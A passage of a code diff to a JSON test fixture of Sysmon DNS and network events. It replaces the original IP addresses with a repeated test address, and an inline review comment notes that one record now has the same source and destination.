03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -3254,7 +3254,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, 
@@ -3277,7 +3277,7 @@ "ProcessId": "2736", "QueryName": "ocsp.pki.goog", "QueryStatus": "0", - "QueryResults": "type: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.581" }, @@ -3355,7 +3355,7 @@ "ProcessId": "2736", "QueryName": "googleads4.g.doubleclick.net", "QueryStatus": "0", - "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;", + "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.872", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -3376,7 +3376,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3457,7 +3457,7 @@ "ProcessId": "2736", "QueryName": "images.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;", + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -3476,7 +3476,7 @@ "version": 5 }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -3538,7 +3538,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:4300:6800:7200:6f00:6d00:6500\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3560,12 +3560,12 @@ "UtcTime": "2019-03-18 16:57:48.250", "User": "NT AUTHORITY\\NETWORK SERVICE", "Image": "C:\\Windows\\System32\\svchost.exe", - "SourceIp": "a00:20f:0:0:18a2:6e00:e0:ffff", + "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "DestinationPort": "5355", "DestinationPortName": "llmnr", "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}", "ProcessId": "924", - "DestinationIp": "e000:fc:4300:6800:7200:6f00:6d00:6500", + "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "SourceIsIpv6": "true", "SourcePort": "55542", "Initiated": "true", 
@@ -3587,7 +3587,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData 
Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "3", "kind": "event" @@ -3616,10 +3616,10 @@ "SourceIsIpv6": "false", "DestinationIsIpv6": "false", "ProcessId": "4", - "DestinationIp": "169.254.255.255", + "DestinationIp": "89.160.20.156", "ProcessGuid": "{42f11c3b-6e19-5c8c-0000-0010eb030000}", "Initiated": "true", - "SourceIp": "169.254.180.25", + "SourceIp": "89.160.20.156", "SourcePort": "137", "SourcePortName": "netbios-ns", "DestinationPort": "137" 
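Review bot: In the rewritten record 16 `SourceIp` and `DestinationIp` are both `89.160.20.156`, replacing a link-local source (`169.254.180.25`) and the subnet broadcast (`169.254.255.255`), so this fixture can no longer distinguish `source.*` from `destination.*`: a pipeline regression that swapped or cross-copied the two sides, including any geo enrichment derived from them, would still produce the expected output. Keeping the two sides distinct preserves that coverage — for example leave the source on `89.160.20.156` and put the destination on a second address the test GeoIP fixture supports (presumably more than one exists), or keep the original `169.254.255.255` broadcast as the destination, since a link-local address is presumably skipped by geo lookup anyway. The `winlog.event_data` copy of the same values in the following hunk (`"DestinationIp"`/`"SourceIp"` under `@@ -3616`) mirrors this and must be changed together with `event.original` so the two stay consistent. A NetBIOS name query (port 137) from a global address to itself is also not a shape a detection rule will ever see, so a broadcast or a second unicast address keeps the sample realistic.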
@@ -3639,7 +3639,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData 
